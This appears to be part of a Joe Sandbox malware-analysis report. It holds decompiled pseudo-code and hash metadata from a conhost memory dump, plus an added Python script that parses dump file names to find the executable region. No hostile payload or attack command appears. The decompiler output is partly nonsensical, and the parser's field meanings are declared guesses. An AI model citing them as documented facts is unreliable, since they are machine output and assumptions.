                        				r8d = 0xa;
                        				__imp___ultoa();
                        				if (_v81 == 0) goto 0x935d16f2;
                        				goto 0x935d16ca;
                        				if (0x65726874 == 0x6b) goto 0x935d16e7;
                        				if ( *((char*)( &_v120 + 0x65726874)) != 0) goto 0x935d16c0;
                        				if (0 == 0x6a) goto 0x935d16e7;
                        				 *((char*)(_t499 + 0x48)) = 0xa;
                        				 *((char*)(_t499 + 0x20646165726895)) = 0;
                        				OutputDebugStringA(??);
                        				abort();
                        				goto 0x935d16db;
                        				asm("o16 nop [cs:eax+eax]");
                        				_t405 =  &_v120;
                        				E00007FF67FF6935D02C0( &_v120);
                        				E00007FF67FF6935CF8A0(0x2064616572687d);
                        				_t220 =  *_t405;
                        				if (_t220 != 0) goto 0x935d1760;
                        				E00007FF67FF6935D1520();
                        				 *_t405 = 1;
                        				E00007FF67FF6935CFBC0(0x2064616572687d);
                        				_pop(_t406);
                        				_pop(_t492);
                        				_pop(_t517);
                        				_pop(_t526);
                        				goto E00007FF67FF6935D04D0;
                        				if (_t220 == 1) goto 0x935d1742;
                        				 *0x935f4050();
                        				r9d = _t220;
                        				0x935e0a98();
                        				goto 0x935d1742;
                        				asm("o16 nop [eax+eax]");
                        				_t496 =  *0x935f8900; // 0x7ff6936023e0
                        				_t340 =  *_t496;
                        				if (_t340 == 0) goto 0x935d18d8;
                        				if ( *((long long*)(_t340 + 0x60)) != 0) goto 0x935d1900;
                        				 *((long long*)(_t340 + 0x60)) = 0x935f3fa8;
                        				E00007FF67FF6935CF8A0(0x935f3fa8);
                        				if ( *((intOrPtr*)(0x20646165726a4d)) != 0) goto 0x935d19b0;
                        				if ( *0x206461657268C5 == 0) goto 0x935d17f0;
                        				free(_t406);
                        				if ( *0x206461657268CD == 0) goto 0x935d17fe;
                        				free(_t492);
                        				if ( *0x206461657268D5 == 0) goto 0x935d180c;
                        				free(__rdi);
                        				 *((long long*)(0x20646165726875)) = 0;
                        				 *((long long*)(0x20646165726a4d)) = 0;
                        				memset(__edi, 0, 2 << 0);
                        				_t341 =  *_t496;
                        				if (_t341 == 0) goto 0x935d1b18;
                        				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x935d1910;
                        				 *((long long*)(_t341 + 0x58)) = 0x93602390;
                        				if ( *0x93602390 == 0) goto 0x935d191e;
                        				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x935d1980;
                        				 *((long long*)(_t341 + 0x58)) = 0x93602390;
                        				 *((long long*)( *0x93602390 + 0x1d0)) = 0x20646165726875;
                        				if ( *((long long*)(_t341 + 0x58)) == 0) goto 0x935d19a0;
                        				 *((long long*)( *((intOrPtr*)(_t341 + 0x58)))) = 0x20646165726875;
                        				if (_t341 == 0) goto 0x935d1963;
                        				_t214 = 0 |  *((long long*)(_t341 + 0x60)) != 0x00000000;
                        				if (_t214 == 0) goto 0x935d1989;
                        				if (_t341 == 0) goto 0x935d1df0;
                        				_pop(_t494);
                        				_t497 = _t517;
                        				_t518 = _t526;
                        				_pop(_t536);
                        				goto E00007FF67FF6935CFBC0;
                        				E00007FF67FF6935D6420();
                        				_t342 =  *_t497;
                        				if ( *((long long*)(_t341 + 0x60)) == 0) goto 0x935d17c2;
                        				if (_t342 != 0) goto 0x935d1900;
                        				E00007FF67FF6935D6420();
                        				asm("o16 nop [cs:eax+eax]");
                        				goto 0x935d17cd;
                        				if ( *((long long*)( *((intOrPtr*)(_t342 + 0x58)))) != 0) goto 0x935d1867;
                        				if ( *((long long*)(_t342 + 0x58)) != 0) goto 0x935d1a98;
                        				 *((long long*)(_t342 + 0x58)) = 0x93602390;
                        				 *0x93602390 = _t494;
                        				if ((_t214 & 0xffffff00 |  *((long long*)(_t342 + 0x50)) != 0x00000000) == 0) goto 0x935d1bcd;
                        				if (_t342 == 0) goto 0x935d204c;
                        				 *((long long*)( *((intOrPtr*)(_t342 + 0x50)))) =  *0x93602390;
                        				if (_t342 != 0) goto 0x935d18a2;
                        				E00007FF67FF6935D6420();
                        				_t343 =  *_t497;
                        				goto 0x935d18aa;
                        				goto 0x935d187d;
                        				 *((long long*)(_t343 + 0x60)) = 0x935f3fa8;
                        				goto 0x935d18bf;
                        				 *((long long*)(_t343 + 0x58)) = 0x93602390;
                        				goto 0x935d1896;
                        				_t344 =  *_t497;
                        				if (_t344 == 0) goto 0x935d1e00;
                        				if ( *((long long*)(_t344 + 0x70)) != 0) goto 0x935d1a88;
                        				 *((long long*)(_t344 + 0x70)) = 0x93602380;
                        				if ( *0x93602380 == 0) goto 0x935d17e2;
                        				if ( *((long long*)( *_t497 + 0x70)) == 0) goto 0x935d1be0;
                        				r12d = 0;
                        				goto 0x935d1a2a;
                        				asm("o16 nop [cs:eax+eax]");
                        				if (0x93602390 == _t518) goto 0x935d17e2;
                        				if (0x7ff69360238f - _t518 < 0) goto 0x935d17e2;
                        				_t347 =  *_t497;
                        				if (_t347 == 0) goto 0x935d1ac8;
                        				if ( *((long long*)(_t347 + 0x68)) == 0) goto 0x935d1aa8;
                        				_t348 =  *_t497;
                        				_t482 = _t518 + 0x7ff69360238f >> 1 << 4;
                        				if (_t536 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x68)))) + _t482 + 8))) goto 0x935d1bf0;
                        				if (_t348 == 0) goto 0x935d1af0;
                        				if ( *((long long*)(_t348 + 0x68)) == 0) goto 0x935d1ab8;
                        				_t350 =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x68))));
                        				if (_t536 -  *((intOrPtr*)(_t350 + _t482 + 8)) < 0) goto 0x935d1a10;
                        				goto 0x935d1a1d;
                        				asm("o16 nop [eax+eax]");
                        				_t351 =  *((intOrPtr*)(_t350 + 0x70));
                        				goto 0x935d19d6;
                        				goto 0x935d1934;
                        				 *((long long*)(_t351 + 0x68)) = 0x93602388;
                        				goto 0x935d1a49;
                        				 *((long long*)(_t351 + 0x68)) = 0x93602388;
                        				goto 0x935d1a72;
                        				E00007FF67FF6935D6420();
                        				_t353 =  *_t497;
                        				if ( *0x7FF6936023F0 == 0) goto 0x935d1aa8;
                        				if (_t353 != 0) goto 0x935d1a41;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d1a41;
                        				E00007FF67FF6935D6420();
                        				_t354 =  *_t497;
                        				if ( *((long long*)(_t353 + 0x68)) == 0) goto 0x935d1ab8;
                        				if (_t354 != 0) goto 0x935d1a6e;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d1a6e;
                        				E00007FF67FF6935D6420();
                        				_t355 =  *_t497;
                        				if ( *((long long*)(_t354 + 0x58)) == 0) goto 0x935d1852;
                        				if (_t355 != 0) goto 0x935d1910;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)( *((intOrPtr*)(_t355 + 0x58)))) == 0) goto 0x935d1e6c;
                        				_t357 =  *_t497;
                        				if (_t357 != 0) goto 0x935d1867;
                        				E00007FF67FF6935D6420();
                        				_t358 =  *_t497;
                        				if ( *((long long*)(_t357 + 0x58)) == 0) goto 0x935d1872;
                        				if (_t358 != 0) goto 0x935d1980;
                        				E00007FF67FF6935D6420();
                        				_t359 =  *_t497;
                        				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x58)))) + 0x1d0)) = _t494;
                        				if (_t359 != 0) goto 0x935d1887;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t359 + 0x58)) == 0) goto 0x935d19a0;
                        				if ( *_t497 != 0) goto 0x935d1892;
                        				E00007FF67FF6935D6420();
                        				_t361 =  *_t497;
                        				goto 0x935d1896;
                        				 *((long long*)(_t361 + 0x50)) = 0x93602398;
                        				goto 0x935d1954;
                        				 *((long long*)(_t361 + 0x70)) = 0x93602380;
                        				goto 0x935d19f3;
                        				if (_t361 == 0) goto 0x935d205e;
                        				if ( *((long long*)(_t361 + 0x68)) != 0) goto 0x935d1cc8;
                        				 *((long long*)(_t361 + 0x68)) = 0x93602388;
                        				_t412 =  *((intOrPtr*)(_t351 + 0x58)) + 1;
                        				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1ee0;
                        				_t281 =  *0x93602380 - _t412; // 0x1
                        				 *((long long*)(_t361 + 0x70)) = 0x93602380;
                        				if (_t281 > 0) goto 0x935d1f62;
                        				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1dd0;
                        				 *((long long*)(_t361 + 0x70)) = 0x93602380;
                        				 *0x93602380 =  *0x93602380 - 1;
                        				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1ed0;
                        				 *((long long*)(_t361 + 0x70)) = 0x93602380;
                        				if ( *0x93602380 != 0) goto 0x935d17e2;
                        				if ( *((long long*)(_t361 + 0x68)) == 0) goto 0x935d201b;
                        				free(??);
                        				_t363 =  *_t497;
                        				if (_t363 == 0) goto 0x935d2077;
                        				if ( *((long long*)(_t363 + 0x78)) == 0) goto 0x935d200b;
                        				_t413 =  *((intOrPtr*)(_t363 + 0x78));
                        				 *_t413 = 0;
                        				if ( *((long long*)(_t363 + 0x70)) == 0) goto 0x935d1ff8;
                        				 *((long long*)( *((intOrPtr*)(_t363 + 0x70)))) =  *_t413;
                        				goto 0x935d17e2;
                        				if ( *_t497 != 0) goto 0x935d1c0f;
                        				E00007FF67FF6935D6420();
                        				_t366 =  *_t497;
                        				if (_t366 != 0) goto 0x935d1c13;
                        				E00007FF67FF6935D6420();
                        				_t367 =  *_t497;
                        				if ( *((long long*)(_t366 + 0x70)) == 0) goto 0x935d1c1e;
                        				if (_t367 != 0) goto 0x935d1ee0;
                        				E00007FF67FF6935D6420();
                        				_t369 =  *_t497;
                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x70)))) - _t413 + 1 <= 0) goto 0x935d1f40;
                        				if (_t369 != 0) goto 0x935d1eed;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t369 + 0x70)) == 0) goto 0x935d1ef4;
                        				if ( *_t497 != 0) goto 0x935d1f62;
                        				E00007FF67FF6935D6420();
                        				_t372 =  *_t497;
                        				if (_t372 != 0) goto 0x935d1f09;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t372 + 0x68)) == 0) goto 0x935d1fe8;
                        				if ( *_t497 != 0) goto 0x935d1f14;
                        				E00007FF67FF6935D6420();
                        				_t375 =  *_t497;
                        				if (_t375 != 0) goto 0x935d202e;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t375 + 0x68)) == 0) goto 0x935d2039;
                        				if ( *_t497 != 0) goto 0x935d1f25;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d1f25;
                        				_t377 =  *_t497;
                        				if (_t377 == 0) goto 0x935d1f68;
                        				goto 0x935d1c4c;
                        				asm("o16 nop [cs:eax+eax]");
                        				E00007FF67FF6935D6420();
                        				goto 0x935d18bb;
                        				asm("o16 nop [eax+eax]");
                        				E00007FF67FF6935D6420();
                        				_t378 =  *_t497;
                        				if ( *((long long*)(_t377 + 0x70)) == 0) goto 0x935d19c8;
                        				if (_t378 != 0) goto 0x935d1a88;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)( *((intOrPtr*)(_t378 + 0x70)))) == 0) goto 0x935d17e2;
                        				_t380 =  *_t497;
                        				if (_t380 != 0) goto 0x935d19e4;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t380 + 0x70)) == 0) goto 0x935d1be0;
                        				if ( *_t497 != 0) goto 0x935d19ef;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d19f3;
                        				_t383 =  *_t497;
                        				if (_t383 != 0) goto 0x935d191e;
                        				E00007FF67FF6935D6420();
                        				_t384 =  *_t497;
                        				if ( *((long long*)(_t383 + 0x58)) == 0) goto 0x935d1929;
                        				if (_t384 != 0) goto 0x935d1a98;
                        				E00007FF67FF6935D6420();
                        				_t415 =  *((intOrPtr*)(_t384 + 0x58));
                        				 *_t415 = _t494;
                        				if ( *_t497 != 0) goto 0x935d1937;
                        				E00007FF67FF6935D6420();
                        				_t386 =  *_t497;
                        				goto 0x935d193f;
                        				goto 0x935d1c66;
                        				if (_t415 -  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x70)))) >= 0) goto 0x935d1c36;
                        				if ( *((long long*)(_t386 + 0x70)) != 0) goto 0x935d1f62;
                        				 *((long long*)(_t386 + 0x70)) = 0x93602380;
                        				if ( *((long long*)(_t386 + 0x68)) == 0) goto 0x935d1fe8;
                        				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x68)))) + (_t415 << 4) - 0x10;
                        				memcpy(??, ??, ??);
                        				_t389 =  *_t497;
                        				if (_t389 != 0) goto 0x935d1c36;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t389 + 0x70)) != 0) goto 0x935d1dd0;
                        				goto 0x935d1c41;
                        				goto 0x935d1eff;
                        				E00007FF67FF6935D6420();
                        				_t391 =  *_t497;
                        				 *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) =  *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) - 1;
                        				if (_t391 != 0) goto 0x935d1c50;
                        				E00007FF67FF6935D6420();
                        				_t392 =  *_t497;
                        				if ( *((long long*)(_t391 + 0x70)) == 0) goto 0x935d1c5b;
                        				if (_t392 != 0) goto 0x935d1ed0;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)( *((intOrPtr*)(_t392 + 0x70)))) != 0) goto 0x935d17e2;
                        				_t394 =  *_t497;
                        				if (_t394 != 0) goto 0x935d1c70;
                        				E00007FF67FF6935D6420();
                        				_t395 =  *_t497;
                        				if ( *((long long*)(_t394 + 0x68)) == 0) goto 0x935d201b;
                        				if (_t395 != 0) goto 0x935d1c7b;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d1c7b;
                        				 *((long long*)(_t395 + 0x68)) = 0x93602388;
                        				goto 0x935d1f18;
                        				 *((long long*)(_t395 + 0x70)) = 0x93602380;
                        				goto 0x935d1cb9;
                        				 *0x7FF6936023F8 = 0x93602378;
                        				goto 0x935d1ca3;
                        				 *0x7FF6936023E8 = 0x93602388;
                        				goto 0x935d1c7f;
                        				if ( *((long long*)(0x7ff6936023f0)) != 0) goto 0x935d1f25;
                        				 *((long long*)(0x7ff6936023f0)) = 0x93602388;
                        				goto 0x935d1f29;
                        				E00007FF67FF6935D6420();
                        				goto 0x935d1954;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)( *_t497 + 0x68)) != 0) goto 0x935d1cc8;
                        				goto 0x935d1c04;
                        				E00007FF67FF6935D6420();
                        				_t401 =  *_t497;
                        				if ( *((long long*)( *_t497 + 0x78)) == 0) goto 0x935d200b;
                        				if (_t401 != 0) goto 0x935d1c9f;
                        				E00007FF67FF6935D6420();
                        				_t402 =  *_t497;
                        				 *((long long*)( *((intOrPtr*)(_t401 + 0x78)))) = 0;
                        				if (_t402 != 0) goto 0x935d1caa;
                        				E00007FF67FF6935D6420();
                        				if ( *((long long*)(_t402 + 0x70)) == 0) goto 0x935d1ff8;
                        				if ( *_t497 != 0) goto 0x935d1cb5;
                        				_t206 = E00007FF67FF6935D6420();
                        				goto 0x935d1cb5;
                        				asm("o16 nop [eax+eax]");
                        				if (_t436 == 0) goto 0x935d20ef;
                        				if ( *((long long*)(_t436 + 0x1d0)) == 0) goto 0x935d20f0;
                        				return _t206;
                        			}
                        0x7ff6935d15e0
                        0x7ff6935d15fb
                        0x7ff6935d160a
                        0x7ff6935d1619
                        0x7ff6935d1628
                        0x7ff6935d162f
                        0x7ff6935d1636
                        0x7ff6935d163b
                        0x7ff6935d1644
                        0x7ff6935d164d
                        0x7ff6935d1656
                        0x7ff6935d165f
                        0x7ff6935d1668
                        0x7ff6935d1671
                        0x7ff6935d167d
                        0x7ff6935d1685
                        0x7ff6935d168d
                        0x7ff6935d1698
                        0x7ff6935d16a0
                        0x7ff6935d16ab
                        0x7ff6935d16b7
                        0x7ff6935d16c8
                        0x7ff6935d16d1
                        0x7ff6935d16d6
                        0x7ff6935d16dd
                        0x7ff6935d16e2
                        0x7ff6935d16e7
                        0x7ff6935d16ed
                        0x7ff6935d1701
                        0x7ff6935d1703
                        0x7ff6935d171a
                        0x7ff6935d171d
                        0x7ff6935d172c
                        0x7ff6935d1731
                        0x7ff6935d1735
                        0x7ff6935d1737
                        0x7ff6935d173c
                        0x7ff6935d1745
                        0x7ff6935d1751
                        0x7ff6935d1752
                        0x7ff6935d1753
                        0x7ff6935d1755
                        0x7ff6935d1757
                        0x7ff6935d1763
                        0x7ff6935d176a
                        0x7ff6935d1770
                        0x7ff6935d1780
                        0x7ff6935d1785
                        0x7ff6935d1787
                        0x7ff6935d17a0
                        0x7ff6935d17a7
                        0x7ff6935d17b1
                        0x7ff6935d17bc
                        0x7ff6935d17c9
                        0x7ff6935d17cd
                        0x7ff6935d17dc
                        0x7ff6935d17e9
                        0x7ff6935d17eb
                        0x7ff6935d17f7
                        0x7ff6935d17f9
                        0x7ff6935d1805
                        0x7ff6935d1807
                        0x7ff6935d1815
                        0x7ff6935d181c
                        0x7ff6935d1837
                        0x7ff6935d183a
                        0x7ff6935d1841
                        0x7ff6935d184c
                        0x7ff6935d1859
                        0x7ff6935d1861
                        0x7ff6935d186c
                        0x7ff6935d1879
                        0x7ff6935d1880
                        0x7ff6935d188c
                        0x7ff6935d1896
                        0x7ff6935d189c
                        0x7ff6935d18a7
                        0x7ff6935d18ac
                        0x7ff6935d18b5
                        0x7ff6935d18c4
                        0x7ff6935d18c6
                        0x7ff6935d18c7
                        0x7ff6935d18cb
                        0x7ff6935d18cf
                        0x7ff6935d18d8
                        0x7ff6935d18e2
                        0x7ff6935d18e6
                        0x7ff6935d18ef
                        0x7ff6935d18f1
                        0x7ff6935d18f6
                        0x7ff6935d1904
                        0x7ff6935d1918
                        0x7ff6935d1923
                        0x7ff6935d1930
                        0x7ff6935d1934
                        0x7ff6935d1941
                        0x7ff6935d194a
                        0x7ff6935d1957
                        0x7ff6935d195d
                        0x7ff6935d1963
                        0x7ff6935d196d
                        0x7ff6935d1974
                        0x7ff6935d1984
                        0x7ff6935d1990
                        0x7ff6935d1994
                        0x7ff6935d19a7
                        0x7ff6935d19ab
                        0x7ff6935d19b0
                        0x7ff6935d19b7
                        0x7ff6935d19c2
                        0x7ff6935d19cf
                        0x7ff6935d19da
                        0x7ff6935d19e9
                        0x7ff6935d19f6
                        0x7ff6935d1a04
                        0x7ff6935d1a06
                        0x7ff6935d1a13
                        0x7ff6935d1a20
                        0x7ff6935d1a26
                        0x7ff6935d1a34
                        0x7ff6935d1a3f
                        0x7ff6935d1a45
                        0x7ff6935d1a4f
                        0x7ff6935d1a58
                        0x7ff6935d1a61
                        0x7ff6935d1a6c
                        0x7ff6935d1a72
                        0x7ff6935d1a7a
                        0x7ff6935d1a80
                        0x7ff6935d1a82
                        0x7ff6935d1a88
                        0x7ff6935d1a8c
                        0x7ff6935d1a9c
                        0x7ff6935d1aa8
                        0x7ff6935d1aaf
                        0x7ff6935d1ab8
                        0x7ff6935d1abf
                        0x7ff6935d1ac8
                        0x7ff6935d1ad2
                        0x7ff6935d1ad6
                        0x7ff6935d1adb
                        0x7ff6935d1ae1
                        0x7ff6935d1ae6
                        0x7ff6935d1af0
                        0x7ff6935d1afa
                        0x7ff6935d1afe
                        0x7ff6935d1b03
                        0x7ff6935d1b09
                        0x7ff6935d1b0e
                        0x7ff6935d1b18
                        0x7ff6935d1b20
                        0x7ff6935d1b29
                        0x7ff6935d1b32
                        0x7ff6935d1b38
                        0x7ff6935d1b45
                        0x7ff6935d1b4b
                        0x7ff6935d1b52
                        0x7ff6935d1b58
                        0x7ff6935d1b60
                        0x7ff6935d1b69
                        (address column of the preceding listing: 165 instruction addresses from 0x7ff6935d1b72 to 0x7ff6935d20ef; the matching disassembly text was not captured)

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentDebugOutputStringThread_ultoaabort
                        • String ID: Error cl$eaning u$eys for $p spin_k$thread
                        • API String ID: 4191895893-3545615192
                        • Opcode ID: 012689f9b7db33477ca97de5f6ef891ae3b3c648869c40152f51c26263e8cba6
                        • Instruction ID: a49cc1e009a6780943fd29956b3cc146bc728be392d276d95d0fbfdeaf2a59c1
                        • Opcode Fuzzy Hash: 012689f9b7db33477ca97de5f6ef891ae3b3c648869c40152f51c26263e8cba6
                        • Instruction Fuzzy Hash: 3121837260CB8081E7708B55F04531AB6E5F785384F148179E2CD97B98DF7DD504CB41
                        Uniqueness

                        Uniqueness Score: -1.00%
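
Every record in this report names its memory dumps with the same eight-field scheme (for example 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp) and repeats the IDA plugin snapshot name hcaresult_58_2_7ff6935c0000_conhost.jbxd. When triaging such a report you want the one executable region to run strings, YARA or a disassembler against, not the seven data regions. The parser below is an added example written for this page; it is not Joe Sandbox code and the naming scheme is not documented here. It assumes, from the values on the page, that field 1 is the PID in hex (0x3A == 58, which matches the snapshot name), field 2 the snapshot index, field 4 the region address, field 5 a PAGE_* protection value (0x20, 0x02, 0x04, 0x08 line up with a PE's code, header, data and write-copy sections) and field 7 a MEM_* region type (01000000 == MEM_IMAGE, consistent with "based on PE: true"); fields 3, 6 and 8 are kept raw because their meaning is not stated. The input list is copied from the dump names in this record.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Windows memory protection and region type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dot-separated fields before ".sdmp". Field meanings are assumptions
# inferred from the values on the page, not a documented Joe Sandbox format.
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# hcaresult_<pid>_<snapshot>_<module base>_<process>.jbxd (assumed layout)
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(\w+)\.jbxd$")

# Dump names taken from this record of the report.
PAGE_DUMPS = [
    "0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp",
    "0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp",
]


@dataclass(frozen=True)
class SdmpRegion:
    name: str
    pid: int        # field 1 (hex): 0000003A -> 58, agrees with the snapshot name
    snapshot: int   # field 2: 00000002 -> snapshot 2
    dump_id: int    # field 3 (decimal): meaning not stated on the page, kept raw
    address: int    # field 4: region start address
    protect: int    # field 5: assumed PAGE_* protection
    field6: int     # field 6: meaning not stated on the page, kept raw
    mem_type: int   # field 7: assumed MEM_* type (01000000 == MEM_IMAGE)
    field8: int     # field 8: meaning not stated on the page, kept raw

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def is_executable(self) -> bool:
        # All PAGE_EXECUTE* values sit in the high nibble of the low byte.
        return bool(self.protect & 0xF0)


def parse_sdmp(name: str) -> SdmpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp dump name: {name}")
    f = m.groups()
    return SdmpRegion(
        name=name, pid=int(f[0], 16), snapshot=int(f[1], 10), dump_id=int(f[2], 10),
        address=int(f[3], 16), protect=int(f[4], 16), field6=int(f[5], 16),
        mem_type=int(f[6], 16), field8=int(f[7], 16),
    )


def matches_snapshot(region: SdmpRegion, snapshot_file: str) -> bool:
    """Cross-check decoded pid and snapshot index against the IDA plugin snapshot name."""
    m = SNAPSHOT_RE.match(snapshot_file)
    if not m:
        return False
    return region.pid == int(m.group(1)) and region.snapshot == int(m.group(2))


def executable_regions(names: List[str], module_base: int) -> List[Tuple[str, int]]:
    """Return (dump name, RVA from module base) for each executable image region."""
    out = []
    for n in names:
        r = parse_sdmp(n)
        if r.is_executable and r.mem_type == 0x1000000 and r.address >= module_base:
            out.append((n, r.address - module_base))
    return out


if __name__ == "__main__":
    for n in PAGE_DUMPS:
        r = parse_sdmp(n)
        print(f"pid={r.pid} snap={r.snapshot} {r.address:#018x} {r.protect_name:<22} {r.type_name}")
    print("executable:", executable_regions(PAGE_DUMPS, 0x7FF6935C0000))
```

With the module base taken from the "Offset: 00007FF6935C0000" line, the only executable dump is the 00007FF6935C1000 region at RVA 0x1000, which is where the decompiled functions in this report live; the other seven dumps are read-only, read-write or write-copy image pages and are the ones to inspect for configuration strings rather than code.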

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                        • String ID: failed to to lock cleanup mutex
                        • API String ID: 3776795807-674698732
                        • Opcode ID: c41f3614338bd67209c4f7cd0a41d0fef92aab0ddd0eaf74ed2eaac13ba6a58c
                        • Instruction ID: faba44c25b2ca1612a52159da73db79d54bfca5778710a8734197fe4aeb04fdf
                        • Opcode Fuzzy Hash: c41f3614338bd67209c4f7cd0a41d0fef92aab0ddd0eaf74ed2eaac13ba6a58c
                        • Instruction Fuzzy Hash: F6214870A1A64781FE759B52D85713923A8FF48B8AB54C4B5C81EEB3A0DE3CE445D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_replace
                        • API String ID: 3510742995-2323331477
                        • Opcode ID: 7ba4b62b8074935b880a2fc299f9cc81f54d40f28926a9126008e9d36fadf55d
                        • Instruction ID: 33cc2c934efab0e0c4e70f0c49424e6ee73fc1a1697b6a61e69de3b4693d02d0
                        • Opcode Fuzzy Hash: 7ba4b62b8074935b880a2fc299f9cc81f54d40f28926a9126008e9d36fadf55d
